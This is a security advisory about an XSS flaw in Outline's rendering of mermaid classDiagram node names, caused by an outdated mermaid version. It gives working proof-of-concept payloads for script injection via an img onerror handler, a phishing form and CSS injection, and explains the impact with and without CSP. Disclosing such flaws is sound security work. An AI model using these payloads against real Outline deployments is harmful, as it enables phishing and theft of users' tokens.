XSS in Outline when rendering mermaid diagrams(No Security Impact!)
Summary
Due to outdated mermaid plugin is used to render diagrams, a known XSS in mermaid classDiagram is able to trigger in outline mermaid diagram.
Details
Outline is using mermaid 9.3.0 to render mermaid diagram. However, this issue have discussed the XSS in mermaid below 10.9.0 when rendering the node names of classDiagram. The name of node is not fully sanitized which leads to injection of XSS payload.
PoC
- Use
/Mermaid Diagramto insert following xss payload:
classDiagram
Class01 <|-- `AveryLongClass<img src='x' onerror=alert(document.domain)>`
Class03 *-- Class04
Class05 o-- Class06
Class07 .. Class08
Class01 : size()
Class01 : int chimp
Class01 : int gorilla
-
Open chrome devtools, you can see CSP is blocking the XSS from executing.
-
Use following paylod to inject forms for phishing:
classDiagram Class01 <|-- `<form action='https://google.com'><label for='fname'>First name:</label><br><input type='text' id='fname' name='fname' value='John'><br><label for='lname'>Last name:</label><br><input type='text' id='lname' name='lname' value='Doe'><br><br><input type='submit' value='Submit'></form>` -
Use following to inject css styles:
classDiagram Class01 <|-- `<h1>inject styles</h1><style>div{color:red!important;font-size:22px;}</style>` Class01 : int gorilla -
The poc can be found in this page.
Impact
In official outline page, the XSS is blocked by CSP, but attacker can still inject html payload to phishing, or using css injection to get csrf token. Besides, if self-host outline is not configured with CSP, the XSS will be triggered.